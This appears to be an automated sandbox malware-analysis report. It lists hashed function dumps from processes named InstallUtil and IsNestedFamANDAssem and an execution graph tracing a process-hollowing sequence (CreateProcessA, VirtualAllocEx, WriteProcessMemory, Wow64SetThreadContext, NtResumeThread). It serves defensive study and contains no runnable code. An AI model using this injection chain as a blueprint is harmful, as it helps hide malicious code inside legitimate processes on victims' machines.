                                                          Function 00E31A40 Relevance: 2.7, Strings: 2, Instructions: 213COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 7@A$Te]q
                                                          • API String ID: 0-2080396276
                                                          • Opcode ID: bae468a3732b62f9a64c0ebec4a290410ba951d88cf569f2455018792784e1ef
                                                          • Instruction ID: 1b5566afa91760cbf1c7fde32fb66fc2e08f712be6085164dfd2a7b58060e98f
                                                          • Opcode Fuzzy Hash: bae468a3732b62f9a64c0ebec4a290410ba951d88cf569f2455018792784e1ef
                                                          • Instruction Fuzzy Hash: 10817034A45104CFD704DF65E58CBA9BBF2FF88316F25A4A8E406AB365CB309C85CB10
                                                          Function 00E318C0 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e32888463e94c654082c36e645e1d46b631805ec925210d05fcc708f612f4edd
                                                          • Instruction ID: eb92095ef48d61b2df378ec6175289eb1a4375e047e6befe637868e6f7882596
                                                          • Opcode Fuzzy Hash: e32888463e94c654082c36e645e1d46b631805ec925210d05fcc708f612f4edd
                                                          • Instruction Fuzzy Hash: AB31E1347482059FD705DB39D898B6A7BE6EFC4360F2491BAE405DB3A8DA34DC45CB20
                                                          Function 00E317E9 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 066cbd9848af9c283083d87ed5f70d7c2efaeb8df53a62a6afe3587da1ea1851
                                                          • Instruction ID: 559780ad3c3cbec7e789199a78899046edddf2fc16eb7396042d0f668b694fff
                                                          • Opcode Fuzzy Hash: 066cbd9848af9c283083d87ed5f70d7c2efaeb8df53a62a6afe3587da1ea1851
                                                          • Instruction Fuzzy Hash: AE11F574D04248EFCB44EFA9D54969CBFF1EF46304F2094EAD008AB265D7345A84DB51
                                                          Function 00D9D809 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466682412.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_d9d000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5b7f67ce9140fae53e50877adf0ca0a41cf5deb9bab109854466ac6741d817dd
                                                          • Instruction ID: 503a4a7181e3e3856b56afc0f0796ac5dad05f60c3077f1628d9968a369834c9
                                                          • Opcode Fuzzy Hash: 5b7f67ce9140fae53e50877adf0ca0a41cf5deb9bab109854466ac6741d817dd
                                                          • Instruction Fuzzy Hash: AF01F7310053049ADB209A1ACC84B66FF9CEF45364F2CC42AED480B287C239D844C6B1
                                                          Function 00E30931 Relevance: .0, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4995afd3d960d614bc42ba05ddc2530719bb17661cfec668f89bf9b0ed6892cf
                                                          • Instruction ID: fedf262aa771e3717f819f34dd460214d54a0f0ab1a4874245bc6e2b6b29bdc7
                                                          • Opcode Fuzzy Hash: 4995afd3d960d614bc42ba05ddc2530719bb17661cfec668f89bf9b0ed6892cf
                                                          • Instruction Fuzzy Hash: 23013C3150D3949FC3425B5998293417FB4EF8B325B0554E7D484EF2A3CA659C05DBA2
                                                          Function 00E317F8 Relevance: .0, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 721603811d610a870ca37634bcb61bd1d890a2345abe202326ab36bcde6e6ce9
                                                          • Instruction ID: d490b3d6d5755f2c337363e5d7a069e9706938907d5737324816e2ffce3a4e2d
                                                          • Opcode Fuzzy Hash: 721603811d610a870ca37634bcb61bd1d890a2345abe202326ab36bcde6e6ce9
                                                          • Instruction Fuzzy Hash: D1110570D04208EFCB44EFA9E5896ACBFF1EB45304F2094F9D008AB254D7745A85CB45
                                                          Function 00D9D808 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466682412.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_d9d000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 367c6e885b607ad98e907f09336e92caa5dbc51207421081fe022397c638a2c2
                                                          • Instruction ID: 9c43728168ed3ec5d278c5aa16cf1f4779f68daa62ed829070a00fabd4279977
                                                          • Opcode Fuzzy Hash: 367c6e885b607ad98e907f09336e92caa5dbc51207421081fe022397c638a2c2
                                                          • Instruction Fuzzy Hash: 93F09671404344DEEB208E1ADC84B66FFA8EF55774F18C55AED484B297C3799C44CAB1
                                                          Function 00E316F0 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6f7c0a86f74b419efce51fae9c1e85b6a205e4a54528979d1ad9de328c65dc9
                                                          • Instruction ID: 4efd3dd5aa6bec7273aa7ba954d80bc356ec9491ba9218686f6eb2df61c41b35
                                                          • Opcode Fuzzy Hash: f6f7c0a86f74b419efce51fae9c1e85b6a205e4a54528979d1ad9de328c65dc9
                                                          • Instruction Fuzzy Hash: 74D0C9700087489FC3461BE9AD086493B7CEE4B22434480E2E485CA133CA2018049B31
                                                          Function 00E3176C Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bfe9a143dc4dacd5b595c2dca27bf7114d6ebad4dba2bcbc67cdc8a4ff64cfd6
                                                          • Instruction ID: 9adb12de19f0d646cf2a67c00254670cbb08e44aaee1b1564ab425a9630c3293
                                                          • Opcode Fuzzy Hash: bfe9a143dc4dacd5b595c2dca27bf7114d6ebad4dba2bcbc67cdc8a4ff64cfd6
                                                          • Instruction Fuzzy Hash: 33C08C20E003A49FEF046BB4B50D32D3F81EB93319F88489CC0819B3A7CAA51C88C731
                                                          Function 00E3361E Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fcb0c95a904701a8fcaefc87b9fe6c972f7aa576119c4b2baff155398bbff4e8
                                                          • Instruction ID: 909a7828b4e27001756169d2abd56ab6fca6adbcb89c8269712838fb75d52256
                                                          • Opcode Fuzzy Hash: fcb0c95a904701a8fcaefc87b9fe6c972f7aa576119c4b2baff155398bbff4e8
                                                          • Instruction Fuzzy Hash: 7AC01230A00104ABCF055B94EC045AD7AB2DF49300F205014F501723A0C9225C009B34
                                                          Function 00E31700 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a5aa096f45c276098947e8d4dc226c008280ed0fdde425d646e14ecde4c7209
                                                          • Instruction ID: 8d53ba7907df301981fc4e591e1372ef741917225c1ca631d1697ec53b24db66
                                                          • Opcode Fuzzy Hash: 6a5aa096f45c276098947e8d4dc226c008280ed0fdde425d646e14ecde4c7209
                                                          • Instruction Fuzzy Hash: ACA01132000B08CB82002BA0BC0C20CBB2CEA0A202B808020E00EC022BCA2028008AA2
                                                          Function 00E30960 Relevance: .0, Instructions: 5COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b17623d59e1ef846e2798f00d89c431f83be160e8bb138a14238a2c528b6cecb
                                                          • Instruction ID: f64f04f0abc94843ea326e81d93807430f85dc9d4e31882bdafc9bd708f52f15
                                                          • Opcode Fuzzy Hash: b17623d59e1ef846e2798f00d89c431f83be160e8bb138a14238a2c528b6cecb
                                                          • Instruction Fuzzy Hash: F790023104570CCB454027D57C49555F75C95C55357809051A50D816129EA5641085A5

                                                          Execution Graph

                                                          Execution Coverage:11.5%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:232
                                                          Total number of Limit Nodes:9
                                                          execution_graph 54885 6cdff89 54886 6cdff43 NtProtectVirtualMemory 54885->54886 54887 6cdff92 54885->54887 54888 6cdff58 54886->54888 54894 6ea8790 54895 6ea87a5 54894->54895 54899 6ea8bd8 54895->54899 54904 6ea8ba7 54895->54904 54896 6ea87bb 54900 6ea8c02 54899->54900 54901 6ea8c46 54900->54901 54909 6eac6f8 54900->54909 54913 6eac6f1 54900->54913 54901->54896 54906 6ea8bbd 54904->54906 54905 6ea8c46 54905->54896 54906->54905 54907 6eac6f8 SleepEx 54906->54907 54908 6eac6f1 SleepEx 54906->54908 54907->54906 54908->54906 54910 6eac738 SleepEx 54909->54910 54912 6eac776 54910->54912 54912->54900 54914 6eac6f7 SleepEx 54913->54914 54916 6eac776 54914->54916 54916->54900 54917 6eac990 54918 6eac9a5 54917->54918 54921 6eacb11 54918->54921 54922 6eacb30 54921->54922 54923 6eac9bb 54922->54923 54924 6ead788 VirtualProtect 54922->54924 54925 6ead780 VirtualProtect 54922->54925 54924->54922 54925->54922 54618 6096f84 54619 6096cd5 54618->54619 54619->54618 54620 6096ce4 54619->54620 54623 6098170 54619->54623 54629 6098180 54619->54629 54624 6098180 54623->54624 54635 6098732 54624->54635 54644 60984f7 54624->54644 54649 6098717 54624->54649 54630 6098195 54629->54630 54632 6098732 10 API calls 54630->54632 54633 6098717 10 API calls 54630->54633 54634 60984f7 10 API calls 54630->54634 54631 60981b7 54631->54619 54632->54631 54633->54631 54634->54631 54636 6098738 54635->54636 54637 609873a 54636->54637 54638 6098746 54636->54638 54641 6098b68 10 API calls 54637->54641 54654 6098b59 54637->54654 54639 609875e 54638->54639 54642 6098b59 10 API calls 54638->54642 54669 6098b68 54638->54669 54641->54639 54642->54639 54645 6098501 54644->54645 54647 6098b59 10 API calls 54645->54647 54648 6098b68 10 API calls 54645->54648 54646 609875e 54647->54646 54648->54646 54650 609872b 54649->54650 54652 6098b59 10 API calls 54650->54652 54653 6098b68 10 API calls 54650->54653 54651 609875e 54652->54651 54653->54651 54655 6098b7d 54654->54655 54684 6099379 54655->54684 54689 6099246 54655->54689 54695 60996c4 54655->54695 54700 6099165 54655->54700 54705 6099db2 54655->54705 54710 6099ff2 54655->54710 54715 6099563 54655->54715 54720 609949e 54655->54720 54725 6099b6c 54655->54725 54730 60991ca 54655->54730 54735 609922b 54655->54735 54740 6099cfb 54655->54740 54656 6098b9f 54656->54639 54670 6098b7d 54669->54670 54672 6099379 2 API calls 54670->54672 54673 6099cfb 4 API calls 54670->54673 54674 609922b 2 API calls 54670->54674 54675 60991ca 2 API calls 54670->54675 54676 6099b6c 2 API calls 54670->54676 54677 609949e 2 API calls 54670->54677 54678 6099563 2 API calls 54670->54678 54679 6099ff2 2 API calls 54670->54679 54680 6099db2 2 API calls 54670->54680 54681 6099165 2 API calls 54670->54681 54682 60996c4 2 API calls 54670->54682 54683 6099246 2 API calls 54670->54683 54671 6098b9f 54671->54639 54672->54671 54673->54671 54674->54671 54675->54671 54676->54671 54677->54671 54678->54671 54679->54671 54680->54671 54681->54671 54682->54671 54683->54671 54685 6099383 54684->54685 54745 6e931d0 54685->54745 54749 6e931d8 54685->54749 54686 609903b 54690 60991eb 54689->54690 54692 609903b 54689->54692 54690->54692 54753 6e92588 54690->54753 54757 6e92580 54690->54757 54691 6099205 54691->54656 54696 60996d3 54695->54696 54761 6e91e78 54696->54761 54765 6e91e71 54696->54765 54697 609903b 54697->54656 54702 6099174 54700->54702 54701 609903b 54703 6e92588 Wow64SetThreadContext 54702->54703 54704 6e92580 Wow64SetThreadContext 54702->54704 54703->54701 54704->54701 54706 6099dc1 54705->54706 54708 6e91e78 WriteProcessMemory 54706->54708 54709 6e91e71 WriteProcessMemory 54706->54709 54707 609903b 54708->54707 54709->54707 54711 609903b 54710->54711 54712 6099379 54710->54712 54713 6e931d8 NtResumeThread 54712->54713 54714 6e931d0 NtResumeThread 54712->54714 54713->54711 54714->54711 54716 6099569 54715->54716 54718 6e91e78 WriteProcessMemory 54716->54718 54719 6e91e71 WriteProcessMemory 54716->54719 54717 6099618 54717->54656 54718->54717 54719->54717 54721 609a0ab 54720->54721 54769 6e92b8a 54721->54769 54773 6e92b90 54721->54773 54722 609903b 54726 6099b76 54725->54726 54728 6e92b8a VirtualAllocEx 54726->54728 54729 6e92b90 VirtualAllocEx 54726->54729 54727 609903b 54728->54727 54729->54727 54731 60991d9 54730->54731 54733 6e92588 Wow64SetThreadContext 54731->54733 54734 6e92580 Wow64SetThreadContext 54731->54734 54732 6099205 54732->54656 54733->54732 54734->54732 54736 609903b 54735->54736 54737 609a085 54735->54737 54738 6e92b8a VirtualAllocEx 54737->54738 54739 6e92b90 VirtualAllocEx 54737->54739 54738->54736 54739->54736 54741 6099d13 54740->54741 54777 609a841 54741->54777 54784 609a850 54741->54784 54742 6099d2b 54746 6e931d8 NtResumeThread 54745->54746 54748 6e93255 54746->54748 54748->54686 54750 6e93220 NtResumeThread 54749->54750 54752 6e93255 54750->54752 54752->54686 54754 6e925cd Wow64SetThreadContext 54753->54754 54756 6e92615 54754->54756 54756->54691 54758 6e92588 Wow64SetThreadContext 54757->54758 54760 6e92615 54758->54760 54760->54691 54762 6e91ec0 WriteProcessMemory 54761->54762 54764 6e91f17 54762->54764 54764->54697 54766 6e91e78 WriteProcessMemory 54765->54766 54768 6e91f17 54766->54768 54768->54697 54770 6e92b90 VirtualAllocEx 54769->54770 54772 6e92c0d 54770->54772 54772->54722 54774 6e92bd0 VirtualAllocEx 54773->54774 54776 6e92c0d 54774->54776 54776->54722 54778 609a850 54777->54778 54780 609a889 54778->54780 54791 609b629 54778->54791 54796 609b216 54778->54796 54801 609ae37 54778->54801 54806 609aeb0 54778->54806 54780->54742 54785 609a867 54784->54785 54786 609b629 2 API calls 54785->54786 54787 609aeb0 2 API calls 54785->54787 54788 609a889 54785->54788 54789 609ae37 2 API calls 54785->54789 54790 609b216 2 API calls 54785->54790 54786->54788 54787->54788 54788->54742 54789->54788 54790->54788 54792 609ad14 54791->54792 54793 609b23c 54791->54793 54793->54791 54811 6e90d68 54793->54811 54815 6e90d58 54793->54815 54797 609b220 54796->54797 54798 609ad14 54797->54798 54799 6e90d68 2 API calls 54797->54799 54800 6e90d58 2 API calls 54797->54800 54799->54797 54800->54797 54802 609ae46 54801->54802 54824 6e90988 54802->54824 54828 6e9097d 54802->54828 54807 609aed8 54806->54807 54809 6e90988 CreateProcessA 54807->54809 54810 6e9097d CreateProcessA 54807->54810 54808 609b30a 54809->54808 54810->54808 54812 6e90d7d 54811->54812 54819 6e91437 54812->54819 54816 6e90d68 54815->54816 54818 6e91437 2 API calls 54816->54818 54817 6e90d93 54817->54793 54818->54817 54820 6e91446 54819->54820 54822 6e91e78 WriteProcessMemory 54820->54822 54823 6e91e71 WriteProcessMemory 54820->54823 54821 6e90d93 54821->54793 54822->54821 54823->54821 54825 6e909ec CreateProcessA 54824->54825 54827 6e90b74 54825->54827 54829 6e90988 CreateProcessA 54828->54829 54831 6e90b74 54829->54831 54889 6096d54 54891 6096cd5 54889->54891 54890 6096ce4 54891->54890 54892 6098170 10 API calls 54891->54892 54893 6098180 10 API calls 54891->54893 54892->54891 54893->54891 54832 16623d8 54833 16623f2 54832->54833 54834 1662402 54833->54834 54838 1664f16 54833->54838 54842 166a569 54833->54842 54847 1663894 54833->54847 54839 1664f35 54838->54839 54850 166fdb8 54839->54850 54843 166b715 54842->54843 54863 6c71189 54843->54863 54868 6c71198 54843->54868 54844 1663010 54849 166fdb8 2 API calls 54847->54849 54848 16638b2 54848->54834 54849->54848 54852 166fddf 54850->54852 54851 1663010 54855 6c70301 54852->54855 54859 6c70308 54852->54859 54856 6c70308 VirtualProtect 54855->54856 54858 6c7038b 54856->54858 54858->54851 54860 6c70350 VirtualProtect 54859->54860 54862 6c7038b 54860->54862 54862->54851 54864 6c71196 54863->54864 54866 6c71144 54863->54866 54872 6c711d9 54864->54872 54866->54844 54869 6c711ad 54868->54869 54871 6c711d9 2 API calls 54869->54871 54870 6c711c5 54870->54844 54871->54870 54873 6c7120f 54872->54873 54877 6c712f0 54873->54877 54881 6c712e8 54873->54881 54874 6c711c5 54874->54844 54878 6c71330 VirtualAlloc 54877->54878 54880 6c7136a 54878->54880 54880->54874 54882 6c712f0 VirtualAlloc 54881->54882 54884 6c7136a 54882->54884 54884->54874

                                                          Executed Functions

                                                          Function 0609C9B8 Relevance: 3.1, Strings: 2, Instructions: 615COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1472 609c9b8-609c9d9 1473 609c9db 1472->1473 1474 609c9e0-609cab3 call 609d508 1472->1474 1473->1474 1481 609cac2 1474->1481 1482 609cab5-609cac0 1474->1482 1483 609cacc-609cb61 1481->1483 1482->1483 1489 609cb6d-609cbe7 1483->1489 1494 609cbf9-609cc24 1489->1494 1495 609cbe9-609cbef 1489->1495 1496 609d3ec-609d408 1494->1496 1495->1494 1497 609cc29-609cd8c call 609b8d0 1496->1497 1498 609d40e-609d429 1496->1498 1509 609cd9e-609cf2f call 6098a10 call 60988e8 1497->1509 1510 609cd8e-609cd94 1497->1510 1522 609cf31-609cf35 1509->1522 1523 609cf94-609cf9e 1509->1523 1510->1509 1525 609cf3d-609cf8f 1522->1525 1526 609cf37-609cf38 1522->1526 1524 609d1c5-609d1e4 1523->1524 1528 609d1ea-609d214 1524->1528 1529 609cfa3-609d0e9 call 609b8d0 1524->1529 1527 609d26a-609d2d5 1525->1527 1526->1527 1546 609d2e7-609d332 1527->1546 1547 609d2d7-609d2dd 1527->1547 1535 609d267-609d268 1528->1535 1536 609d216-609d264 1528->1536 1558 609d0ef-609d1bb call 609b8d0 1529->1558 1559 609d1be-609d1bf 1529->1559 1535->1527 1536->1535 1548 609d338-609d3d0 1546->1548 1549 609d3d1-609d3e9 1546->1549 1547->1546 1548->1549 1549->1496 1558->1559 1559->1524
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fbq$8
                                                          • API String ID: 0-3186246319
                                                          • Opcode ID: 052ee01af4275cbcb90d6eebfab036063856676a89c5b89711c53d331a1cd53d
                                                          • Instruction ID: 4a801d5e73006a26f14d602fb3000ce2dbd7e9b4dc73375e0e94ea550e006a69
                                                          • Opcode Fuzzy Hash: 052ee01af4275cbcb90d6eebfab036063856676a89c5b89711c53d331a1cd53d
                                                          • Instruction Fuzzy Hash: 8D52D775E012298FDBA4DF69C850AD9B7B2FF89310F1085AAD909B7344DB34AE85CF50
                                                          Function 0609C9A8 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2076 609c9a8-609c9b0 2077 609c93a-609c95f 2076->2077 2078 609c9b2-609c9d9 2076->2078 2081 609c9db 2078->2081 2082 609c9e0-609cab3 call 609d508 2078->2082 2081->2082 2092 609cac2 2082->2092 2093 609cab5-609cac0 2082->2093 2094 609cacc-609cb61 2092->2094 2093->2094 2100 609cb6d-609cbe7 2094->2100 2105 609cbf9-609cc24 2100->2105 2106 609cbe9-609cbef 2100->2106 2107 609d3ec-609d408 2105->2107 2106->2105 2108 609cc29-609cd8c call 609b8d0 2107->2108 2109 609d40e-609d429 2107->2109 2120 609cd9e-609cf2f call 6098a10 call 60988e8 2108->2120 2121 609cd8e-609cd94 2108->2121 2133 609cf31-609cf35 2120->2133 2134 609cf94-609cf9e 2120->2134 2121->2120 2136 609cf3d-609cf8f 2133->2136 2137 609cf37-609cf38 2133->2137 2135 609d1c5-609d1e4 2134->2135 2139 609d1ea-609d214 2135->2139 2140 609cfa3-609d0e9 call 609b8d0 2135->2140 2138 609d26a-609d2d5 2136->2138 2137->2138 2157 609d2e7-609d332 2138->2157 2158 609d2d7-609d2dd 2138->2158 2146 609d267-609d268 2139->2146 2147 609d216-609d264 2139->2147 2169 609d0ef-609d1bb call 609b8d0 2140->2169 2170 609d1be-609d1bf 2140->2170 2146->2138 2147->2146 2159 609d338-609d3d0 2157->2159 2160 609d3d1-609d3e9 2157->2160 2158->2157 2159->2160 2160->2107 2169->2170 2170->2135
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fbq$h
                                                          • API String ID: 0-3598783323
                                                          • Opcode ID: 12f019d668fbd2f7b9b792aa4243eb225a714a7c6c923ae5574678776d41506a
                                                          • Instruction ID: ae8f30da0cb018ba9e78d7cdbdf2d027b10714db3b8eb83a17671b3bd5a07e0e
                                                          • Opcode Fuzzy Hash: 12f019d668fbd2f7b9b792aa4243eb225a714a7c6c923ae5574678776d41506a
                                                          • Instruction Fuzzy Hash: 4381F675D012198FEB54DF69C840AD9BBB6FF89304F1082AAD509A7250DB345E85CFA1
                                                          Function 06CDFEB8 Relevance: 1.6, APIs: 1, Instructions: 69nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06CDFF49
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385524832.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6cd0000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: b45ef3363c5b56d53dc05c6b212c8520eae8ea28a75795ddf7f11daa8713b2c0
                                                          • Instruction ID: f332ff6f67d4a1e5dbc716caaa3ebc61211581a09fcc116232b0dc19e4d97f64
                                                          • Opcode Fuzzy Hash: b45ef3363c5b56d53dc05c6b212c8520eae8ea28a75795ddf7f11daa8713b2c0
                                                          • Instruction Fuzzy Hash: 8221F4B1D012499FCB10DFAAD984ADEFBF9FF48310F20842AE519A7350C775A940CBA5
                                                          Function 06CDFEC0 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06CDFF49
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385524832.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6cd0000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: e257c4caf7a6dde1b36eeebe4290a36ba37d284bd04e7f0c2b56447c66af04cd
                                                          • Instruction ID: 6b768882051e05fe25f41939c12ff230a5d55e6088c3f69b138b0475492dadbd
                                                          • Opcode Fuzzy Hash: e257c4caf7a6dde1b36eeebe4290a36ba37d284bd04e7f0c2b56447c66af04cd
                                                          • Instruction Fuzzy Hash: 7A21D2B1D012499FCB10DFAAD984AEEFBF5FF48310F20842AE519A7250C775A944CBA5
                                                          Function 06E931D0 Relevance: 1.6, APIs: 1, Instructions: 60nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 06E93246
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: e02e487acc0a50dd8b991c1298467b5eea2ff6dd9313f4c62ecf7a7809fcbac5
                                                          • Instruction ID: 76309b3caf2ba1c8f827c7aab713a61d2bc43819a13662157fac7a2c373a9221
                                                          • Opcode Fuzzy Hash: e02e487acc0a50dd8b991c1298467b5eea2ff6dd9313f4c62ecf7a7809fcbac5
                                                          • Instruction Fuzzy Hash: B41138B1D003088ECB10DFAAC485AEFFBF5EF48324F10842AD419A7640CB799944CFA1
                                                          Function 06E931D8 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 06E93246
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 9a65e7142fffc465563fbfdd376e83b88a23d2247b9e8b70f4934b6f7480d5b1
                                                          • Instruction ID: 44f15c8ba66faad1790e1ac57328940c03ae1426894674b29e008a940807f74a
                                                          • Opcode Fuzzy Hash: 9a65e7142fffc465563fbfdd376e83b88a23d2247b9e8b70f4934b6f7480d5b1
                                                          • Instruction Fuzzy Hash: C11126B1D003488FCB10DFAAC484AAEFBF4FF88314F10842AD419A7240DB78A944CFA5
                                                          Function 06CDFF89 Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06CDFF49
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385524832.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6cd0000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
